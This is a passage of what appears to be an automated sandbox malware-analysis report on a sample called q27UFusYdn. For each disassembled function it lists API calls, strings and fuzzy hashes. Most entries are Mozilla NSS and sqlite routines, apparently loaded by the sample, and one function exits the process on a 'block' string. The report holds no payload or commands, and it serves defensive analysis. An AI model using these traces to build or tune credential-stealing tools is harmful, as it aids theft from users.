Opcode ID: 5afc9099f5b42ba3cafe876b2a88ec6093f7867a423de374b3c71784ac088570
Instruction ID: 1de334ac5b45d3330e690053ac0f39dd436016a56b2806b900bcda672d4be56b
Opcode Fuzzy Hash: 5afc9099f5b42ba3cafe876b2a88ec6093f7867a423de374b3c71784ac088570
Instruction Fuzzy Hash: FB61B071A043819BDB10CE24DC60F5B77B4AB8435CF34452CF95997B91EB34E919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE68E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CE68E01,00000000,6CE69060,6CF70B64), ref: 6CE68E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CE68E01,00000000,6CE69060,6CF70B64), ref: 6CE68E9E
PORT_ArenaAlloc_Util.NSS3(6CF70B64,00000001,?,?,?,?,6CE68E01,00000000,6CE69060,6CF70B64), ref: 6CE68EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CE68E01,00000000,6CE69060,6CF70B64), ref: 6CE68EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CE68E01,00000000,6CE69060,6CF70B64), ref: 6CE68ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CE68E01,00000000,6CE69060,6CF70B64), ref: 6CE68EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CE68E01), ref: 6CE68EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CF70B64,6CF70B64), ref: 6CE68F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CE68F3F

Part of subcall function 6CE6A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CE6A421,00000000,00000000,6CE69826), ref: 6CE6A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE6904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CE68E76

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 95d26309f01792c86741a7790431a621082e3798cf83508ddbbba4bd747a90e4
Instruction ID: c2f2dd2ea428c4033ab52d8460bd3909bc1544fbc6dacf89961d134e206cd106
Opcode Fuzzy Hash: 95d26309f01792c86741a7790431a621082e3798cf83508ddbbba4bd747a90e4
Instruction Fuzzy Hash: 0F61B4B5D102099BDB10CFA6CC40AAFB7B5FF85358F244128DC58A7B01E736A915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE58F40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CE59582), ref: 6CE58F5B

Part of subcall function 6CE6BE30: SECOID_FindOID_Util.NSS3(6CE2311B,00000000,?,6CE2311B,?), ref: 6CE6BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CE58F6A

Part of subcall function 6CE70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE187ED,00000800,6CE0EF74,00000000), ref: 6CE71000
Part of subcall function 6CE70FF0: PR_NewLock.NSS3(?,00000800,6CE0EF74,00000000), ref: 6CE71016
Part of subcall function 6CE70FF0: PL_InitArenaPool.NSS3(00000000,security,6CE187ED,00000008,?,00000800,6CE0EF74,00000000), ref: 6CE7102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CE58FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6CE58FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6CF3D820,6CE59576), ref: 6CE58FF9
DER_GetInteger_Util.NSS3(?), ref: 6CE5901D
PORT_ZAlloc_Util.NSS3(?), ref: 6CE5903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE59062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CE590A2
PORT_ZAlloc_Util.NSS3(?), ref: 6CE590CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6CE590F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CE5912D
free.MOZGLUE(00000000), ref: 6CE59136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE59145

Strings

5s/, xrefs: 6CE58F4F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID: 5s/
API String ID: 3626836424-340167759
Opcode ID: 2489710e105f4cda9638de656f27ccb2d42a0301e774d52d1d2af4ac09e9be3a
Instruction ID: ec123de62a6d0d7d84a91619b20af9cf05d38ff8014d268c2304e98bdb36662b
Opcode Fuzzy Hash: 2489710e105f4cda9638de656f27ccb2d42a0301e774d52d1d2af4ac09e9be3a
Instruction Fuzzy Hash: ED51F2B2A142009BE710CF28DC41B9BB7F4AF84318F65452DE958C7741E736E956CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE80C60 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,l), ref: 6CE80C81

Part of subcall function 6CE6BE30: SECOID_FindOID_Util.NSS3(6CE2311B,00000000,?,6CE2311B,?), ref: 6CE6BE44

Part of subcall function 6CE58500: SECOID_GetAlgorithmTag_Util.NSS3(6CE595DC,00000000,00000000,00000000,?,6CE595DC,00000000,00000000,?,6CE37F4A,00000000,?,00000000,00000000), ref: 6CE58517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE80CC4

Part of subcall function 6CE6FAB0: free.MOZGLUE(?,-00000001,?,?,6CE0F673,00000000,00000000), ref: 6CE6FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CE80CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CE80D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CE80D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CE80D7D
free.MOZGLUE(00000000), ref: 6CE80DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE80DC1
free.MOZGLUE(00000000), ref: 6CE80DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE80E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CE80E0F

Part of subcall function 6CE595C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CE37F4A,00000000,?,00000000,00000000), ref: 6CE595E0
Part of subcall function 6CE595C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CE37F4A,00000000,?,00000000,00000000), ref: 6CE595F5
Part of subcall function 6CE595C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CE59609
Part of subcall function 6CE595C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CE5961D
Part of subcall function 6CE595C0: PK11_GetInternalSlot.NSS3 ref: 6CE5970B
Part of subcall function 6CE595C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CE59756
Part of subcall function 6CE595C0: PK11_GetIVLength.NSS3(?), ref: 6CE59767
Part of subcall function 6CE595C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CE5977E
Part of subcall function 6CE595C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE5978E

Strings

*,l, xrefs: 6CE80C69, 6CE80DE0, 6CE80C80, 6CE80C8B, 6CE80CAF
5s/, xrefs: 6CE80C6F
*,l, xrefs: 6CE80DCC
-$l, xrefs: 6CE80C64

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,l$*,l$-$l$5s/
API String ID: 3136566230-1881706717
Opcode ID: 83ae3c11c7dd534c1dcd9884471a504733de284c903c8dd3ecb877fe136f7123
Instruction ID: d8358a3b7e6668d4a735506c6c09e302ac6baff1e70c75ea65dbc46c55ff4696
Opcode Fuzzy Hash: 83ae3c11c7dd534c1dcd9884471a504733de284c903c8dd3ecb877fe136f7123
Instruction Fuzzy Hash: 5B41C4B1D02255ABEB009F65DC41BEF7674AF4530CF204128E91957781E735EA15CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CEDCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CEDCC7B), ref: 6CEDCD7A

Part of subcall function 6CEDCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CE4C1A8,?), ref: 6CEDCE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CEDCDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CEDCDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CEDCDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CEDCD8E

Part of subcall function 6CE005C0: PR_EnterMonitor.NSS3 ref: 6CE005D1
Part of subcall function 6CE005C0: PR_ExitMonitor.NSS3 ref: 6CE005EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CEDCDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CEDCDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CEDCE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CEDCE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CEDCE48

Strings

getaddrinfo, xrefs: 6CEDCD88, 6CEDCDF9
freeaddrinfo, xrefs: 6CEDCD9F, 6CEDCE10
ws2_32.dll, xrefs: 6CEDCD75
getnameinfo, xrefs: 6CEDCDB2, 6CEDCE23
wship6.dll, xrefs: 6CEDCDE3

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 0966046a7ef968b1a2b2671f6159ddbbf7a6d61a3fefdd2f519303077b0ee23b
Instruction ID: 9feaf79793a916d53faf1eadae7a989533eaefffcd9632a6f2849a63eb10c15c
Opcode Fuzzy Hash: 0966046a7ef968b1a2b2671f6159ddbbf7a6d61a3fefdd2f519303077b0ee23b
Instruction Fuzzy Hash: 451120E5F2252156D7416F713C11AAF3E785B0208CF358938D809D2F42FB21D51E86F1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE32C40 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?l,?,6CE2E477,?,?,?,00000001,00000000,?,?,6CE33F23,?), ref: 6CE32C62
EnterCriticalSection.KERNEL32(0000001C,?,6CE2E477,?,?,?,00000001,00000000,?,?,6CE33F23,?), ref: 6CE32C76
PL_HashTableLookup.NSS3(00000000,?,?,6CE2E477,?,?,?,00000001,00000000,?,?,6CE33F23,?), ref: 6CE32C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CE2E477,?,?,?,00000001,00000000,?,?,6CE33F23,?), ref: 6CE32C93

Part of subcall function 6CEBDD70: TlsGetValue.KERNEL32 ref: 6CEBDD8C
Part of subcall function 6CEBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CEBDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CE2E477,?,?,?,00000001,00000000,?,?,6CE33F23,?), ref: 6CE32CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CE2E477,?,?,?,00000001,00000000,?,?,6CE33F23,?), ref: 6CE32CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CE2E477,?,?,?,00000001,00000000,?,?,6CE33F23), ref: 6CE32CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CE2E477,?,?,?,00000001,00000000,?), ref: 6CE32CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CE2E477,?,?,?,00000001,00000000,?), ref: 6CE32D4D
EnterCriticalSection.KERNEL32(?), ref: 6CE32D61
PL_HashTableLookup.NSS3(?,?), ref: 6CE32D71
PR_Unlock.NSS3(?), ref: 6CE32D7E

Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007AD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007CD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007D6
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CD9204A), ref: 6CE007E4
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,6CD9204A), ref: 6CE00864
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE00880
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,6CD9204A), ref: 6CE008CB
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008D7
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008FB

Strings

5s/, xrefs: 6CE32C4C
#?l, xrefs: 6CE32C43

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?l$5s/
API String ID: 2446853827-2207008678
Opcode ID: 02e87a37dfd71d5edad97ff4a9629359ddf12f329dbb11436e033c4f455047c7
Instruction ID: 15d83b76ce930967dd2191d05f5cfb84c0001e2f96a484ca97bdbb62f330a6f4
Opcode Fuzzy Hash: 02e87a37dfd71d5edad97ff4a9629359ddf12f329dbb11436e033c4f455047c7
Instruction Fuzzy Hash: 12511776D00214ABDB01AF24DC45AAA7774FF1931CB248528EC5C97B12E731F968CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEEA4C0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CEEA4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CEEA4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEEA553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CEEA5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEEA5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEEA60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CEEA633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEEA671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CEEA69A

Strings

%s at line %d of [%.10s], xrefs: 6CEEA62C
5s/, xrefs: 6CEEA4D0
database corruption, xrefs: 6CEEA627
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CEEA61D, 6CEEA68B, 6CEEA6B3

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption$5s/
API String ID: 2358773949-852466114
Opcode ID: 09d1076233d6d86f21c3bc7e2d30acdd63c748a3279c28fe17002a865a63d326
Instruction ID: 4d80dd7b4941888c7028ab420ecf3765ee17890aa057295d175f6cff8cccbc34
Opcode Fuzzy Hash: 09d1076233d6d86f21c3bc7e2d30acdd63c748a3279c28fe17002a865a63d326
Instruction Fuzzy Hash: 1E51C5B1948301ABCB018F25D881A5A7FF1AF4935CF24886DF8898B751F735DD98CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8AD90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE8ADB1

Part of subcall function 6CE6BE30: SECOID_FindOID_Util.NSS3(6CE2311B,00000000,?,6CE2311B,?), ref: 6CE6BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE8ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE8AE08

Part of subcall function 6CE6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF418D0,?), ref: 6CE6B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE8AE25
PL_FreeArenaPool.NSS3 ref: 6CE8AE63
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE8AE4D

Part of subcall function 6CD94C70: TlsGetValue.KERNEL32(?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94C97
Part of subcall function 6CD94C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94CB0
Part of subcall function 6CD94C70: PR_Unlock.NSS3(?,?,?,?,?,6CD93921,6CF714E4,6CEDCC70), ref: 6CD94CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE8AE93
PR_CallOnce.NSS3(6CF72AA4,6CE712D0), ref: 6CE8AECC
PL_FreeArenaPool.NSS3 ref: 6CE8AEDE
PL_FinishArenaPool.NSS3 ref: 6CE8AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE8AEF5
PL_FinishArenaPool.NSS3 ref: 6CE8AF16

Strings

5s/, xrefs: 6CE8ADA2
security, xrefs: 6CE8ADEE

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security$5s/
API String ID: 3441714441-2291600020
Opcode ID: 0985f95c6c728b41faa0187e63391eab1ed338a00dfb4bc2f0d6afcc453a2b08
Instruction ID: b4fcf93fd1e222c891d8ec1f59e33ec22f3ab0a092beb45e31313d5038ef2f5e
Opcode Fuzzy Hash: 0985f95c6c728b41faa0187e63391eab1ed338a00dfb4bc2f0d6afcc453a2b08
Instruction Fuzzy Hash: CA411AB1985210A7EB215B14DC45BAA32B8AF4231CF34092AE85C96FC1F7359999C7F3

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE2D40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CEE2D9F

Part of subcall function 6CD9CA30: EnterCriticalSection.KERNEL32(?,?,?,6CDFF9C9,?,6CDFF4DA,6CDFF9C9,?,?,6CDC369A), ref: 6CD9CA7A
Part of subcall function 6CD9CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CD9CB26

sqlite3_exec.NSS3(?,?,6CEE2F70,?,?), ref: 6CEE2DF9
sqlite3_free.NSS3(00000000), ref: 6CEE2E2C
sqlite3_free.NSS3(?), ref: 6CEE2E3A
sqlite3_free.NSS3(?), ref: 6CEE2E52
sqlite3_mprintf.NSS3(6CF4AAF9,?), ref: 6CEE2E62
sqlite3_free.NSS3(?), ref: 6CEE2E70
sqlite3_free.NSS3(?), ref: 6CEE2E89
sqlite3_free.NSS3(?), ref: 6CEE2EBB
sqlite3_free.NSS3(?), ref: 6CEE2ECB
sqlite3_free.NSS3(00000000), ref: 6CEE2F3E
sqlite3_free.NSS3(?), ref: 6CEE2F4C

Strings

5s/, xrefs: 6CEE2D52

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID: 5s/
API String ID: 1957633107-340167759
Opcode ID: 2a52b304d9e35fd6143c13317eae520a90bb43ff6c5c43d818a5e29b91d3fc18
Instruction ID: 8b919c97861b4874754bc4cf702efc07013fd093543d57a1e78de8391467da87
Opcode Fuzzy Hash: 2a52b304d9e35fd6143c13317eae520a90bb43ff6c5c43d818a5e29b91d3fc18
Instruction Fuzzy Hash: 1C619EB5E012168BEB01CFA8D885B9EB7B1EF5938CF254028DD15AB711E731E845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 0040FB05
ExitProcess.KERNEL32 ref: 0040FB11
strtok_s.MSVCRT ref: 0040FB28

Strings

block, xrefs: 0040FAF7

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 8259de89bfbde49ab53180d3e810b9deec6107944c9e036c38e8419895e02503
Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
Opcode Fuzzy Hash: 8259de89bfbde49ab53180d3e810b9deec6107944c9e036c38e8419895e02503
Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 6CF2AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

